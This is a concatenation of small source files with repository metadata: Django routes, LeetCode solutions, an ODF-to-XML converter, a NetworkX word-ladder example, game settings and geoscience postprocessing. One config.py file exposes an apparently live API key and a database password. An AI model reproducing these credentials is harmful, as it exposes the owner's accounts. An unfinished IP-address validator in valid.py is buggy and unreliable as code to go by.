3722dfe4b345da3064f22f3aa75951aaedd848ee
|
d429b2a1f2af4ba988e96c86e39985c19b8ffb51
|
refs/heads/master
| 2022-04-14T13:13:47.312671
| 2020-04-16T13:18:17
| 2020-04-16T13:18:17
| 256,219,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, nana and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestAuthor(unittest.TestCase):
pass
|
[
"mohamed.hafezqo@gmail.com"
] |
mohamed.hafezqo@gmail.com
|
12965f0d92a6486ae33f800cf7b821d5ddd92a07
|
0d6820aa4958aff7ff083aaa78e899b70d201c73
|
/src_docker_version/imdb_clone/imdb_clone/urls.py
|
1edce63ea2d3db9ed13fd05f0ef1d908aa887a8b
|
[] |
no_license
|
ramankumarrudr/ImdbClone_DeltaX
|
e15ccd363b14be74fd49ade873a8ce061e50bdf5
|
b789da271eaad6fb0866e55d60ad61e230f56db5
|
refs/heads/master
| 2023-04-30T13:09:54.225152
| 2019-08-12T12:42:04
| 2019-08-12T12:42:04
| 199,679,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
from django.contrib import admin
from django.urls import path,re_path
from django.urls import include
from django.conf.urls import url
from app import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index,name='index'),
re_path(r'^tvshow/$', views.tvshows,name='tvshow'),
re_path(r'^actor/$', views.actor_images,name='actor'),
re_path(r'^exit/$', views.formexit,name='exit'),
re_path(r'^form/$',views.post,name='form'),
re_path(r'^showform/$',views.post_tvshow,name='show_form'),
re_path(r'^actor-form/$',views.actor,name='actor_form'),
re_path(r'^form/(?P<id>\d+)/edit/$',views.movie_update,name="update"),
re_path(r'^index/(?P<id>\d+)/delete/$',views.movie_delete,name="delete"),
re_path(r'^showform/(?P<id>\d+)/edit/$',views.tvshow_update,name="update_tvshow"),
re_path(r'^tvshow/(?P<id>\d+)/delete/$',views.tvshow_delete,name="delete_tvshow"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
[
"ramankumar.rudr@gmail.com"
] |
ramankumar.rudr@gmail.com
|
8366171b9a7ff4af419cd587e13a7454da48da19
|
8ad6662c4fa0755d33a0cf62ddc50b3815e870a0
|
/venv/bin/odf2xml
|
9e26999219b30a41cc49d95be21f3ce36a2d4bc6
|
[] |
no_license
|
xarala221/gestion-parrainage
|
1dea1aabadb8049ea64e716c30c8ff4e3208a001
|
6efebaa7271a0c6644e0b868877ca71630b4e455
|
refs/heads/master
| 2020-04-05T02:11:29.592504
| 2018-11-07T19:31:26
| 2018-11-07T19:31:26
| 156,467,445
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,493
|
#!/home/hackerpro/projects/2019/parrainage/venv/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2008 Søren Roug, European Environment Agency
#
# This is free software. You may redistribute it under the terms
# of the Apache license and the GNU General Public License Version
# 2 or at your option any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
#
# OpenDocument can be a complete office document in a single
# XML document. This script will create such a document.
import sys, getopt, base64
from odf.opendocument import load
from odf.draw import Image, ObjectOle
from odf.style import BackgroundImage
from odf.text import ListLevelStyleImage
from odf.office import BinaryData
if sys.version_info[0]==3: unicode=str
def usage():
sys.stderr.write("Usage: %s [-e] [-o outputfile] [inputfile]\n" % sys.argv[0])
if __name__ == "__main__":
embedimage = False
try:
opts, args = getopt.getopt(sys.argv[1:], "o:e", ["output="])
except getopt.GetoptError:
usage()
sys.exit(2)
outputfile = '-'
for o, a in opts:
if o in ("-o", "--output"):
outputfile = a
if o == '-e':
embedimage = True
if len(args) > 1:
usage()
sys.exit(2)
if len(args) == 0:
d = load(sys.stdin)
else:
d = load(unicode(args[0]))
if embedimage:
images = d.getElementsByType(Image) + \
d.getElementsByType(BackgroundImage) + \
d.getElementsByType(ObjectOle) + \
d.getElementsByType(ListLevelStyleImage)
for image in images:
href = image.getAttribute('href')
if href and href[:9] == "Pictures/":
p = d.Pictures[href]
bp = base64.encodestring(p[1])
image.addElement(BinaryData(text=bp))
image.removeAttribute('href')
xml = d.xml()
if outputfile == '-':
print (xml)
else:
open(outputfile,"wb").write(xml)
# Local Variables: ***
# mode: python ***
# End: ***
|
[
"xaralaxarala@gmail.com"
] |
xaralaxarala@gmail.com
|
|
dce2a94fb0ea75fa40eb112d0bb3937eb37b2d3c
|
9e831c0defd126445772cfcee38b57bfd8c893ca
|
/code/questions/241~250_/246.py
|
f54c941a608497cd2b46602faf9664a20fa052a7
|
[] |
no_license
|
m358807551/Leetcode
|
66a61abef5dde72250d032b7ea06feb3f2931d54
|
be3f037f6e2057a8f2acf9e820bbbbc21d7aa1d2
|
refs/heads/main
| 2023-04-22T15:13:43.771145
| 2021-05-07T06:47:13
| 2021-05-07T06:47:13
| 321,204,181
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
"""
https://leetcode-cn.com/problems/strobogrammatic-number/
"""
class Solution(object):
def isStrobogrammatic(self, num):
"""
:type num: str
:rtype: bool
"""
left, right = 0, len(num)-1
while left < right:
if num[left]+num[right] not in '00 11 88 69 96'.split():
return False
left += 1
right -= 1
return num[left] in '018' if left == right else True
print(
)
|
[
"m358807551@163.com"
] |
m358807551@163.com
|
cac2631608240c84ba8954024d8ea505c9f2951c
|
9845e9a4616f9bd2e55996507bf96d47d7553d8c
|
/Shirley/Notebooks and Resources/config.py
|
6eec9eff508eb0a25f4f932c8bbf659434834eff
|
[] |
no_license
|
suealexa/Plane_project
|
28e26ca728077f97801a508f511a2643b4a75129
|
d55f0f3759804530d365cdb03f300871c6317490
|
refs/heads/master
| 2020-12-19T21:56:30.461197
| 2020-01-23T19:02:46
| 2020-01-23T19:02:46
| 235,864,572
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
api_key = 'AIzaSyBoe3QXczQK_5R-ivDFVgVH0a_3GDxnXfI'
username = 'postgres'
password = 'Learn2019!'
|
[
"noreply@github.com"
] |
suealexa.noreply@github.com
|
d9872a8513d7495f66afca7c52f6b105ad784190
|
955773323446846eff0fbd4e9d3e3a543226f6db
|
/SomeProject/FaceDetection/get_date.py
|
a546924631b028235eb51789a59528d3b7a1ddd8
|
[] |
no_license
|
zhxing001/ML_DL
|
94d8aa64a459b4d257efefe160dac7fb5433e91e
|
6c6a0a42f52d7d392dc844aa94306221c52e319a
|
refs/heads/master
| 2021-07-15T20:14:16.976797
| 2018-10-31T02:42:55
| 2018-10-31T02:42:55
| 135,117,665
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,970
|
py
|
def get_date_and_label():
import matplotlib.pyplot as plt
#读入数据和标签,我存了一份JPG格式的,但是这样存储是有问题的,matlab三通道拉长的话是
#一个通道连续存储,而python是一个位置三个通道连续存储。所以最后还是改用mat型存储
#==============================================================================
# train_img=cv2.imread('train_img.jpg',0)
# train_label=cv2.imread('train_label.jpg',0)
# test_img=cv2.imread('test_img.jpg',0)
# test_label=cv2.imread('test_label.jpg',0)
#
# train_img_reshape=np.reshape(train_img,[-1,64,64,3])
# plt.imshow(train_img_reshape[1])
#
#==============================================================================
import scipy.io as sio
#使用scipy.io来加载mat文件,还是挺好用的
train_img_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/train_img1.mat')
train_img=train_img_mat['train_img_rz']
train_label_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/train_label1.mat')
train_label=train_label_mat['train_labels']
test_img_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/test_img1.mat')
test_img=test_img_mat['test_img_rz']
test_label_mat=sio.loadmat('C:/Users/zhxing/Desktop/data/test_label1.mat')
test_label=test_label_mat['test_labels']
return train_img,train_label,test_img,test_label
#=====测试下数据对不对,看来是没有问题的=========================================================================
# for i in range(0,15):
# img=train_img[i,:,:,:]
# plt.figure()
# plt.imshow(img)
# plt.title(train_label[i])
#
#==============================================================================
#==============================================================================
# for i in range(0,15):
# img=test_img[i,:,:,:]
# plt.figure()
# plt.imshow(img)
# plt.title(test_label[i])
#==============================================================================
|
[
"zhxing_cas@163.com"
] |
zhxing_cas@163.com
|
890dc7e724af48f6a0735079ff1f93c895ef6d0e
|
35d8b4775d24dd013fac07a8cfd2b672a4ec925e
|
/724. Find Pivot Index.py
|
5d55381dd6d72dcaa4aa76b0a401f22bf8530f4f
|
[] |
no_license
|
melekoktay/Leetcode-Practice
|
a6aba796a1dd9bd239ff64db010c086079c2218f
|
d181f2075c6c3881772dfbf54df3ac3390936079
|
refs/heads/master
| 2022-12-21T07:00:37.086434
| 2020-10-12T22:40:34
| 2020-10-12T22:40:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
'''
724. Find Pivot Index My SubmissionsBack to Contest
Given an array of integers nums, write a method that returns the "pivot" index of this array.
We define the pivot index as the index where the sum of the numbers to the left of the index is equal to the sum of the numbers to the right of the index.
If no such index exists, we should return -1. If there are multiple pivot indexes, you should return the left-most pivot index.
Example 1:
Input:
nums = [1, 7, 3, 6, 5, 6]
Output: 3
Explanation:
The sum of the numbers to the left of index 3 (nums[3] = 6) is equal to the sum of numbers to the right of index 3.
Also, 3 is the first index where this occurs.
Example 2:
Input:
nums = [1, 2, 3]
Output: -1
Explanation:
There is no index that satisfies the conditions in the problem statement.
Note:
The length of nums will be in the range [0, 10000].
Each element nums[i] will be an integer in the range [-1000, 1000].
'''
from tools import timing
class Solution:
@timing
def pivotIndex(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums) < 3:
return -1
left_sum = 0
right_sum = sum(nums)
for i, num in enumerate(nums):
right_sum -= num
if left_sum == right_sum:
return i
left_sum += num
return -1
nums = [1, 2, 3]
nums2 = [1, 7, 3, 6, 5, 6]
print nums
print Solution().pivotIndex(nums)
print nums2
sol = Solution()
print sol.pivotIndex(nums2)
|
[
"buaaluqiang@hotmail.com"
] |
buaaluqiang@hotmail.com
|
87caa856e0d6cc766fc6a3ffde69398715dc4ac3
|
dc66af3b1640f2748c13fbc3802a5855f9b6ae01
|
/Project Implementation/ML_DL/Count_no_of_coins/Iishi/object_detection_edge.py
|
bfa52532d1337ce2e3f6dea02a8e7eaa8e8af260
|
[] |
no_license
|
jerelyn-premjit/Dawn
|
a9629e7eaafd7c43313e530bc6efa98eb46595a1
|
7cf9cc0509e5f965cede7e36066014f0d3e818df
|
refs/heads/master
| 2022-01-07T09:50:37.850846
| 2019-04-17T14:08:30
| 2019-04-17T14:08:30
| 184,249,330
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
import cv2
img = cv2.imread('coins.png')
bilateral_filtered_image = cv2.bilateralFilter(img, 5, 175, 175)
edge_detected_image = cv2.Canny(bilateral_filtered_image, 75, 200)
cv2.imshow('Edge', edge_detected_image)
cv2.waitKey(0)
contours,h = cv2.findContours(edge_detected_image,1,2)
for cnt in contours:
cv2.drawContours(img,[cnt],0,(0,255,0),1)
cv2.imshow('Objects Detected',img)
cv2.waitKey(0)
|
[
"iishipatel@gmail.com"
] |
iishipatel@gmail.com
|
d83ead9269308088dace0d3a4793ea36908e4b40
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/valid_20200616215224.py
|
a3e2a3055cb4ab737c0f457a39c3d13fdc34ef94
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
# Ipv4 --> 4 decimal numbers,between 0 to 255
# leading zero's is invalid
# check whethere its a digit between 0 to 255
import string
def valid(str):
if str[len(str)-1] == ":" or str[len(str)-1] == ".":
return "Neither"
address = str.split(".")
numbers = range(0,256)
result = None
for a in address:
if len(address) == 4:
print(a.isdigit())
if a.isdigit() == False:
result = "Neither"
else:
if int(a) in numbers:
if len(a) == 2 and a[0] == "0":
result = "Neither"
result = "IPv4"
return result
else:
newAddress = str.split(":")
i = 0
while i < len(newAddress)-1:
print(newAddress[i])
well = all(c in string.hexdigits for c in newAddress[i])
if newAddress[i] == "":
return "Neither"
if well == True:
return "IPV6"
else:
return "Neither"
i +=1
return result
print(valid("12..33.4"))
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
3fc6eb8ea204b5fd78b064ff2167321ea6e5d64d
|
7998938fd5d56c01f6053883b6b2faeeb9f77465
|
/test/test_result_code.py
|
105c6a1a911a2527518863042fb31179b797da0d
|
[] |
no_license
|
jasonsemko/swagger
|
d87b7fe16aff701e1e6f4446f272a5fd8fc4bb01
|
23e1b837cf2f384731933ac5bf6bd90d5e1b290e
|
refs/heads/master
| 2020-06-24T15:20:57.586047
| 2017-07-11T22:49:48
| 2017-07-11T22:49:48
| 96,943,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,211
|
py
|
# coding: utf-8
"""
AvaTax REST API
The AvaTax REST API exposes the most commonly used available for interacting with the AvaTax service, allowing calculation of tax, modification of documents, and validation of addresses. If you're unsure of which API to use, a full comparison of the differences between the functionality provided by our REST and SOAP interfaces is documented [here](http://developer.avalara.com/avatax/soap-or-rest/). The [SOAP API reference](http://developer.avalara.com/avatax/api-reference/tax/soap) is also available.
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.result_code import ResultCode
class TestResultCode(unittest.TestCase):
""" ResultCode unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testResultCode(self):
"""
Test ResultCode
"""
model = swagger_client.models.result_code.ResultCode()
if __name__ == '__main__':
unittest.main()
|
[
"jasonsemko@gmail.com"
] |
jasonsemko@gmail.com
|
fe5d5716001ab8bdc4208658dae4a013ef944713
|
18b67c9db2ba65b68e3efbf7133b92cc3fb6cc2b
|
/setup.py
|
fb9a7e719bf40fcf631821217e0075e5515cf606
|
[] |
no_license
|
Abbie-gz/cicd-demo-v5
|
153557af920849a8475b4a3b7f73012078d5e835
|
ce0634261e677135db3280be58ab9ccce022be5e
|
refs/heads/main
| 2023-06-03T05:34:23.098949
| 2021-07-01T14:33:51
| 2021-07-01T14:33:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from setuptools import find_packages, setup
from cicd_demo_2 import __version__
setup(
name="cicd_demo_2",
packages=find_packages(exclude=["tests", "tests.*"]),
setup_requires=["wheel"],
version=__version__,
description="Databricks Labs CICD Templates Sample Project",
author="",
)
|
[
"ypyabby@163.com"
] |
ypyabby@163.com
|
a346f70258b827ad3d297c165e834c474f52f801
|
08175e7b7f96316b183e1e86cca238bb5305ae8d
|
/words_len5_edited_dist.py
|
3554be5737960d60db6458f9af749fa19a9b8e92
|
[
"BSD-3-Clause"
] |
permissive
|
GrahamAtkinson035/lab8_word-ladders
|
32215792f2022d7a554000fd0f6b8a3526d6a303
|
cab5c794be5a869c337e25adb73f3f89c4a3f63e
|
refs/heads/master
| 2021-01-16T22:39:28.438457
| 2016-02-08T15:39:15
| 2016-02-08T15:39:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,199
|
py
|
"""
Words/Ladder Graph
------------------
Generate an undirected graph over the 5757 5-letter words in the
datafile words_dat.txt.gz. Two words are connected by an edge
if they differ in one letter, resulting in 14,135 edges. This example
is described in Section 1.1 in Knuth's book [1]_,[2]_.
References
----------
.. [1] Donald E. Knuth,
"The Stanford GraphBase: A Platform for Combinatorial Computing",
ACM Press, New York, 1993.
.. [2] http://www-cs-faculty.stanford.edu/~knuth/sgb.html
"""
__author__ = """\n""".join(['Aric Hagberg (hagberg@lanl.gov)',
'Brendt Wohlberg',
'hughdbrown@yahoo.com'])
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import networkx as nx
#-------------------------------------------------------------------
# The Words/Ladder graph of Section 1.1
#-------------------------------------------------------------------
def anagrams(word):
if len(word) < 2:
return word
else:
tmp = []
for i, letter in enumerate(word):
for j in anagrams(word[:i]+word[i+1:]):
tmp.append(j+letter)
return tmp
def generate_graph(words):
from string import ascii_lowercase as lowercase
G = nx.Graph(name="words")
lookup = dict((c,lowercase.index(c)) for c in lowercase)
def edit_distance_one(word):
for i in range(len(word)):
left, c, right = word[0:i], word[i], word[i+1:]
j = lookup[c] # lowercase.index(c)
for cc in lowercase[j+1:]:
ana_word = left + cc + right
ana_list = anagrams(ana_word)
for i in ana_list:
yield i
candgen = ((word, cand) for word in sorted(words)
for cand in edit_distance_one(word) if cand in words)
G.add_nodes_from(words)
for word, cand in candgen:
G.add_edge(word, cand)
return G
def words_graph():
"""Return the words example graph from the Stanford GraphBase"""
import gzip
fh=gzip.open('words_dat.txt.gz','r')
words=set()
for line in fh.readlines():
line = line.decode()
if line.startswith('*'):
continue
w=str(line[0:5])
words.add(w)
return generate_graph(words)
if __name__ == '__main__':
from networkx import *
G=words_graph()
print("Loaded words_dat.txt containing 5757 five-letter English words.")
print("Two words are connected if they differ in one letter in any position.")
print("Graph has %d nodes with %d edges"
%(number_of_nodes(G),number_of_edges(G)))
print("%d connected components" % number_connected_components(G))
for (source,target) in [('chaos','order'),
('nodes','graph'),
('pound','marks')]:
print("Shortest path between %s and %s is"%(source,target))
try:
sp=shortest_path(G, source, target)
for n in sp:
print(n)
except nx.NetworkXNoPath:
print("None")
|
[
"themesta@gmail.com"
] |
themesta@gmail.com
|
de1f9e1c256a8eb9c3c61a0f88aea6549d4cadbe
|
e61e78c9f616bafe7a64d77e43fe46f0385f93f8
|
/listDemo.py
|
ea980835174a94a92fe80efb9af941e912a0c14c
|
[] |
no_license
|
dafaWang/myPythonDemo
|
6fb3ad3c3cebcc0f5b2d5c3f2e445efa5fe2ee33
|
859160fb227a3bbde383ef1c01fc4b61d574e451
|
refs/heads/master
| 2021-01-20T16:22:01.096182
| 2017-05-11T09:53:41
| 2017-05-11T09:53:41
| 90,835,363
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
p1 = input('请输入第1个数')
p2 = input('请输入第2个数')
p3 = input('请输入第3个数')
p4 = input('请输入第4个数')
p5 = input('请输入第5个数')
mList = [p1,p2,p3,p4,p5]
print('当前list为 %s' %mList)
print('第3个数为 : %s'%mList[2])
print('最后一个数为 : %s'%mList[-1])
p6 = input('请添加一个数')
mList.append(p6)
print('当前最新的list为 : %s' %mList)
p7 = input('请添加一个数')
index1 = input('选择插入位置,大于等于0,小于等于%s'%len(mList))
mList.insert(int(index1),p7)
print('当前最新list为 : %s'%mList)
index2 = input("选择删除一个数的位置 大于等于0,小于等于 %s" %len(mList))
mList.pop(int(index2))
print('当前最新list为 : %s'%mList)
|
[
"mocen_dafa@163.com"
] |
mocen_dafa@163.com
|
424419177c915e19bc48bf256f83929f73ac7213
|
3186e93270607285bbe8bde229ea454ffec58935
|
/venv/bin/f2py3.7
|
eda1f7254ba66bfc6d31f322c9ad2bf7819455bb
|
[] |
no_license
|
suryanuj/stock-comparisons
|
e206135564137b588ccfb0b4552178b9fedd9288
|
f0c8692bb958b4f9d375e497f27e8b9f1f0a7f89
|
refs/heads/master
| 2022-11-05T08:29:22.749066
| 2020-06-21T05:20:37
| 2020-06-21T05:20:37
| 273,838,272
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
7
|
#!/Users/suryanuj/PycharmProjects/btctracker/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"suryanuj@udel.edu"
] |
suryanuj@udel.edu
|
a5ccc09d7d0c444b38aea3201e3f43bbd7d419df
|
b11e3ae9cb19091f9babd0addb38a9537fb79b21
|
/venv/Scripts/easy_install-3.7-script.py
|
fdd7d963c1265ceb076f2648798e521ff245db29
|
[] |
no_license
|
scorchgid/OWM-Application
|
2d47d5b9f3da570f5f4b8366d842431593087f8e
|
268b6c54dd5df417b2e302adcd33fc10c426ac84
|
refs/heads/master
| 2020-07-22T14:22:00.958513
| 2019-09-17T18:53:37
| 2019-09-17T18:53:37
| 207,231,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
#!C:\Users\Gideon\PycharmProjects\OWM-Application\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"scorchgid@gmail.com"
] |
scorchgid@gmail.com
|
9750a57f98f60e192b3530c22876a6db24b56047
|
e67b0c01d7244f1c635d7c2e12157076bcd2efbc
|
/EX06/ex6.py
|
72ee32c78b12115672c3bead9de6607b7e6f755f
|
[] |
no_license
|
SonjaGrusche/LPTHW
|
0a7de74101db1b0ae62ffc35d4fac990c894ae14
|
12483e97373c9e0aa9e8785b20bb34e1e5b4b36a
|
refs/heads/master
| 2021-01-12T15:52:06.404665
| 2017-03-21T10:27:53
| 2017-03-21T10:27:53
| 71,830,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,301
|
py
|
# the variable for x gets set, it consists of a string with a format character and its variable at the end
x = "There are %d types of people." % 10
# the variable for binary is binary
binary = "binary"
# the variable for do_not is don't
do_not = "don't"
# the variable for y is a string that includes two format characters and its variables at the and
y = "Those who know %s and those who %s." % (binary, do_not) # two strings inside a string
# line 11 and 12 print what'sinside the variables for x and y
print x
print y
# lines 15 and 16 print what's inside the quotes usind the variables at the end to fill in the format characters
print "I said %r." % x # string inside string
print "I also said: '%s'." % y # one string that already includes two strings is put inside string
# lines 19 and 20 define two more variables
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
# line 23 prints the variable for joke_evaluation and fills in the variable for hilarious for the format character
print joke_evaluation % hilarious
# line 26 and 27 define two variables
w = "This is the left side of..."
e = "a string with a right side."
# variables from line 26 and 27 get printed
print w + e
# Study Drill
# 4. the + concatenates the two strings (not functioning as a math operater)
|
[
"sonja.grusche@stud.leuphana.de"
] |
sonja.grusche@stud.leuphana.de
|
67a00c31c0fab3d6c19689900052c3bc7f8309ee
|
ab81f9cfebe641b3400901e77a7fc6ee4cba3180
|
/src/pre-commit
|
aafdce2b8b01da9bfc1cd65013f17d0d5bf32d35
|
[] |
no_license
|
1garo/git_python_script
|
0ffbe272e8d3fb1056506e3f45e5d7ef271c4e2b
|
d68c05f3034c877530531ebe98503062e10278c0
|
refs/heads/master
| 2020-09-09T02:43:35.112667
| 2019-11-14T16:30:31
| 2019-11-14T16:30:31
| 221,321,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,031
|
#!/usr/bin/env python3
import script_2
import os
def create():
documents = os.popen(
"git diff --cached --name-status").read().splitlines() # Pega todos os documentos dentro da cache prestes a serem comitados
i = 0
alcance = len(documents)
while i < alcance:
full_line = documents[i].split()
if full_line[0] == "R100":
documents[i] = full_line[2]
i += 1
elif full_line[0] == "D":
documents.pop(i)
alcance -= 1
else:
documents[i] = full_line[1]
i += 1
block = 0
resp = "Testes OK. Commit Realizado"
i = 0
for i in range(len(documents)):
r = script_2.main(documents[i]) # Faz a verificacao definida em scriptPat.Compare
if r == 0:
print(documents[i] + " : Teste realizado com sucesso")
else:
resp = "Nao commitado"
block = 1
print(resp)
os._exit(block) # Bloqueia o commit
if __name__ == '__main__':
create()
|
[
"alevardai@hotmail.com"
] |
alevardai@hotmail.com
|
|
839af1b1bae6047079453f2f80a9265386152b24
|
24c84c5b93cd816976d370a99982f45e0d18a184
|
/SearchingSorting/BubbleSort.py
|
af60e6f3c4c2e2ff5a7dda335ee95c1b44f0a6c1
|
[] |
no_license
|
purushottamkaushik/DataStructuresUsingPython
|
4ef1cf33f1af3fd25105a45be4f179069e327628
|
e016fe052c5600dcfbfcede986d173b401ed23fc
|
refs/heads/master
| 2023-03-12T13:25:18.186446
| 2021-02-28T18:21:37
| 2021-02-28T18:21:37
| 343,180,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
def bubblesort(arr):
for i in range(len(arr)):
for j in range(len(arr)-i-1):
if arr[j] > arr[j+1]:
arr[j] ,arr[j+1] = arr[j+1] , arr[j]
arr = [1,10,2,12,5]
print(arr)
bubblesort(arr)
print(arr)
|
[
"purushottamkaushik96@gmail.com"
] |
purushottamkaushik96@gmail.com
|
fc6477a6967e95f2b3e5884278adfc5093b566e6
|
ba4706218366e65b35dc5892a77c3394c374ea6f
|
/settings.py
|
afa28b8bb01fed93b4af4fb6cb5e298c5578575e
|
[] |
no_license
|
tngo0508/alien_invasion
|
e282f82a0658049d04313e4f283b57ddc296465c
|
5dbd4a113e136065a81eb5d906a0b6feb158b33b
|
refs/heads/master
| 2020-03-26T04:43:04.861008
| 2018-08-16T05:15:03
| 2018-08-16T05:15:03
| 144,518,830
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
class Settings():
"""A class to store all settings for Alien Invasion."""
def __init__(self):
"""Initialize the game's static setting."""
# Screen settings
self.screen_width = 1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
# Ship settings
self.ship_speed_factor = 1.5
self.ship_limit = 3
# Bullet Settings
self.bullet_speed_factor = 3
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
self.bullets_allowed = 3
# Alien settings
self.alien_speed_factor = 1
self.fleet_drop_speed = 10
# fleet_direction of 1 represents right; -1 represents left.
self.fleet_direction = 1
self.alien_points = 50
# How quickly the game speeds up
self.speedup_scale = 1.1
# How quickly the alien point values increase
self.score_scale = 1.5
self.initialize_dynamic_setting()
def initialize_dynamic_setting(self):
"""Initialize settings that change throughout the game."""
self.ship_speed_factor = 1.5
self.bullet_speed_factor = 3
self.alien_speed_factor = 1
# fleet_direction of 1 represents right; -1 represents left.
self.fleet_direction = 1
# Scoring
self.alien_points = 50
def increase_speed(self):
"""Increase speed settings and alien point values."""
self.ship_speed_factor *= self.speedup_scale
self.bullet_speed_factor *= self.speedup_scale
self.alien_speed_factor *= self.speedup_scale
self.alien_points = int(self.alien_points * self.score_scale)
|
[
"tngo0508@gmail.com"
] |
tngo0508@gmail.com
|
27513eaeeed5a4e2b0c720da1465aca4782fe138
|
5df88ea861b19a7ffdd318ab64c0ca23f1baa30b
|
/ModelInputsAndRunScripts/PostprocessingScripts/calc_elev_and_slope.py
|
fbac57ec943376677705e3789afa14e46f46608b
|
[
"MIT"
] |
permissive
|
gregtucker/tucker_mccoy_hobley_grain_hill_manuscript
|
2283c7aa33d57ba61404d319cfb41679549016ff
|
179c73dc4e2f8b971028f23619e12acaf6a0ea7f
|
refs/heads/master
| 2020-03-08T15:28:27.288806
| 2018-06-05T15:14:26
| 2018-06-05T15:14:26
| 128,212,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,226
|
py
|
#!/usr/env/python
"""
calc_elev_and_slope.py
Reads output from a series of GrainHill runs, and for each, calculates:
1 - the maximum elevation
2 - the mean elevation
3 - the mean slope.
4 - the mean soil thickness.
5 - the fractional soil cover.
These are written to a csv file.
"""
import os
import sys
from landlab.io.native_landlab import load_grid
import numpy as np
DEFAULT_OUTPUT_NAME = 'grain_hill_results.csv'
DEFAULT_INPUT_NAME = 'grain_hill_model0001.nc.grid'
DEFAULT_INPUT_PATH = os.getcwd()
def calc_fractional_soil_cover(grid, node_state):
"""Calculate and return fractional soil versus rock cover."""
num_soil_air_faces = 0.0
num_rock_air_faces = 0.0
for link in range(grid.number_of_links):
tail = grid.node_at_link_tail[link]
head = grid.node_at_link_head[link]
if node_state[tail] == 0: # if tail is air, see if head is rock/sed
if node_state[head] == 7:
num_soil_air_faces += 1
elif node_state[head] == 8:
num_rock_air_faces += 1
elif node_state[head] == 0: # if head is air, see if tail is rock/sed
if node_state[tail] == 7:
num_soil_air_faces += 1
elif node_state[tail] == 8:
num_rock_air_faces += 1
total_surf_faces = num_soil_air_faces + num_rock_air_faces
frac_rock = num_rock_air_faces / total_surf_faces
frac_soil = num_soil_air_faces / total_surf_faces
print('Total number of surface faces: ' + str(total_surf_faces))
print('Number of soil-air faces: ' + str(num_soil_air_faces))
print('Number of rock-air faces: ' + str(num_rock_air_faces))
print('Percent rock-air faces: ' + str(100.0 * frac_rock))
print('Percent soil-air faces: ' + str(100.0 * frac_soil))
return frac_soil, total_surf_faces, num_soil_air_faces, num_rock_air_faces
